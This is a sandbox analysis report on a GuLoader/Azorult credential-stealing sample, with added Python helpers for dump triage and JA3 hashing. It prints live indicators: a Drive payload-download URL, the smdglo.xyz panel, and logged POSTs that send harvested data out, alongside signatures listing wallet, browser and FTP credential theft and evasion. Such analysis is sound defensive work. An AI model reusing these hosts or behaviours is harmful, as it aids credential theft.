Windows Analysis Report X4lLneI8ZK.exe

Overview

General Information

Sample Name: X4lLneI8ZK.exe
Analysis ID: 479789
MD5: 4103a2b04ede0d36e5079f6799cdfa14
SHA1: 23b477810f258963e62458ed02e82c58c8c00adc
SHA256: b923011216d37106f2f497f12097ecd3412caca89edee1a49e8090b94344a310
Tags: 32, exe, trojan

Detection

GuLoader, Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Classification chart (axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious). Only the axis labels survived extraction; the chart itself is not reproduced here.

AV Detection:

Found malware configuration
Source: 00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}"}
Multi AV Scanner detection for submitted file
Source: X4lLneI8ZK.exe VirusTotal: Detection: 38%
Source: X4lLneI8ZK.exe ReversingLabs: Detection: 35%

Compliance:

Uses 32bit PE files
Source: X4lLneI8ZK.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: X4lLneI8ZK.exe, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910332025.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: msvcp140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909154010.000000001F568000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.17.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr
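Every "Source" entry of the form 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp above is a Joe Sandbox memory-dump identifier, and reading the fields tells you which dumps are worth unpacking before you open any of them. The first field is the process index (0x11 = 17, the same process that dropped mozglue.dll.17.dr, nss3.dll.17.dr and the other browser-credential libraries), the fourth is the base address of the dumped region, and the fifth reads as a Windows PAGE_* protection value: 0x40 (PAGE_EXECUTE_READWRITE) marks the single region at 0x02300000 in process 0 from which the configuration extractor pulled GuLoader's config and which holds the 0_2_0230xxxx functions that call NtAllocateVirtualMemory, NtProtectVirtualMemory and NtWriteVirtualMemory, while every process-17 dump is 0x04 (PAGE_READWRITE) data. The protection reading is an assumption corroborated by those addresses; the second and last fields are not documented on this page and are left unlabelled. The following Python is an added editorial helper for triaging such identifiers, not Joe Sandbox code; the identifier list is a subset copied from this report.

```python
import re
from collections import defaultdict

# Dump identifiers copied from this report (a subset).
DUMP_IDS = [
    "00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp",
    "00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp",
    "00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp",
    "00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp",
    "00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp",
]

# winnt.h memory-protection constants; execute bits are the 0x10..0x80 nibble.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

SDMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$",
    re.I,
)
CODEFN_RE = re.compile(r"^(\d+)_(\d+)_([0-9A-Fa-f]{8})$")


def parse_sdmp(name):
    """Split a Joe Sandbox .sdmp identifier into its fields."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not an sdmp identifier: %s" % name)
    proc, kind, dump_id, base, prot, extra = m.groups()
    return {
        "process_index": int(proc, 16),  # 0x11 -> 17, matches the ".17.dr" dropped files
        "kind": int(kind, 16),           # meaning not documented on the page; left as-is
        "dump_id": int(dump_id),
        "base": int(base, 16),
        "protection": int(prot, 16),     # assumption: PAGE_* value (0x40 RWX, 0x04 RW)
        "extra": int(extra, 16),         # meaning not documented on the page; left as-is
    }


def is_executable(entry):
    return bool(entry["protection"] & EXECUTE_MASK)


def executable_regions(names):
    """(process index, base) of every dump taken from executable memory."""
    return [(e["process_index"], e["base"])
            for e in map(parse_sdmp, names) if is_executable(e)]


def regions_by_process(names):
    groups = defaultdict(set)
    for e in map(parse_sdmp, names):
        groups[e["process_index"]].add(e["base"])
    return {k: sorted(v) for k, v in groups.items()}


def containing_dump(process_index, address, names):
    """Nearest dump base at or below `address` in the same process.

    Dump sizes are not encoded in the identifier, so this is a nearest-lower-base
    heuristic rather than a true range check."""
    bases = [e["base"] for e in map(parse_sdmp, names)
             if e["process_index"] == process_index and e["base"] <= address]
    return max(bases) if bases else None


def locate_function(tag, names):
    """Map a report tag such as '0_2_02308A39' to (process index, dump base or None)."""
    proc, _mid, addr = CODEFN_RE.match(tag).groups()
    proc, addr = int(proc), int(addr, 16)
    return proc, containing_dump(proc, addr, names)
```

Run over the list above, executable_regions returns only the process-0 region at 0x02300000, locate_function("0_2_02308A39", DUMP_IDS) lands in that region, and locate_function("0_2_00401B77", DUMP_IDS) returns no dump because 0x00401B77 lies in the on-disk image rather than in any dumped allocation.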

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 4x nop then mov ecx, ecx 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 4x nop then mov ecx, ecx 0_2_00402D9F

Networking:

Performs DNS queries to domains with low reputation
Source: DNS query: smdglo.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}
(The extractor's string is truncated and ends in a stray "}"; the full download ID observed on the wire is 1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE. Note also that this Drive URL is GuLoader's payload host, not a C2: the only command-and-control endpoint in this report is the Azorult panel at smdglo.xyz/panel/index.php.)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
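The JA3 value above is the MD5 of fields taken from the TLS ClientHello, so it fingerprints the TLS stack the sample used (consistent with the IE-style User-Agent strings in the HTTP requests below), not the malware itself; it is a pivot for hunting related samples, not an attribution. The following Python, added here as an editorial example and not part of Joe Sandbox's report, shows exactly what goes into the string before hashing. The ClientHello is constructed for the example: the cipher list, extensions and the SNI drive.google.com are chosen to illustrate the format (including GREASE values that JA3 must discard) and are not recovered from the capture.

```python
import hashlib
import struct

# GREASE values (RFC 8701): JA3 drops them so randomised ClientHellos hash stably.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}


def build_client_hello(version, ciphers, extensions):
    """Wrap a ClientHello (constructed test input) in a TLS handshake record.

    `extensions` is a list of (type, body) pairs in wire order."""
    body = struct.pack(">H", version) + bytes(32)            # client_random: zeros
    body += b"\x00"                                           # empty session_id
    body += struct.pack(">H", 2 * len(ciphers))
    body += b"".join(struct.pack(">H", c) for c in ciphers)
    body += b"\x01\x00"                                       # one compression method: null
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack(">H", len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def _u16(buf, off):
    return struct.unpack(">H", buf[off:off + 2])[0]


def ja3_string(record):
    """Return 'version,ciphers,extensions,curves,point_formats' for a ClientHello record."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a handshake record carrying a ClientHello")
    hs = record[5:]
    p = 4                                   # handshake type + 3-byte length
    version = _u16(hs, p); p += 2
    p += 32                                 # client_random
    p += 1 + hs[p]                          # session_id
    cs_len = _u16(hs, p); p += 2
    ciphers = [_u16(hs, i) for i in range(p, p + cs_len, 2)]
    p += cs_len
    p += 1 + hs[p]                          # compression_methods
    ext_types, curves, points = [], [], []
    if p < len(hs):
        ext_len = _u16(hs, p); p += 2
        end = p + ext_len
        while p < end:
            t, n = _u16(hs, p), _u16(hs, p + 2)
            p += 4
            d = hs[p:p + n]
            p += n
            ext_types.append(t)
            if t == 10:                     # supported_groups
                curves = [_u16(d, i) for i in range(2, 2 + _u16(d, 0), 2)]
            elif t == 11:                   # ec_point_formats
                points = list(d[1:1 + d[0]])

    def join(values):
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([str(version), join(ciphers), join(ext_types), join(curves), join(points)])


def ja3_hash(record):
    return hashlib.md5(ja3_string(record).encode("ascii")).hexdigest()


def sample_hello():
    """Constructed ClientHello: TLS 1.2 version, a GREASE cipher and a GREASE extension
    that JA3 must ignore, SNI, x25519 + secp256r1, uncompressed point format."""
    name = b"drive.google.com"
    sni = struct.pack(">H", len(name) + 3) + b"\x00" + struct.pack(">H", len(name)) + name
    return build_client_hello(
        0x0303,
        [0x0A0A, 0x1301, 0xC02B],
        [(0x1A1A, b""), (0, sni), (10, b"\x00\x04\x00\x1D\x00\x17"), (11, b"\x01\x00")],
    )
```

For the constructed hello, ja3_string returns 771,4865-49195,0-10-11,29-23,0: the GREASE cipher 0x0A0A and extension 0x1A1A are gone, and nothing from the SNI body or the random is included, which is why two clients with the same TLS library collide on JA3 regardless of what they connect to. To reproduce the report's value you would feed the first client-to-server TLS record of the 49818 or 49819 flow from the pcap into ja3_hash.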
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0g-b4-docs.googleusercontent.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  POST /panel/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: smdglo.xyz
  Content-Length: 107
  Cache-Control: no-cache
  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b
  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;
Source: global traffic HTTP traffic detected:
  POST /panel/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: smdglo.xyz
  Content-Length: 89809
  Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: X4lLneI8ZK.exe String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: X4lLneI8ZK.exe String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: X4lLneI8ZK.exe String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.thawte.com0
Source: X4lLneI8ZK.exe String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: X4lLneI8ZK.exe String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp String found in binary or memory: http://smdglo.xyz/panel/index.php
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp String found in binary or memory: http://smdglo.xyz/panel/index.phpB
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.17.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://www.mozilla.com0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/Ap
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-chP
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
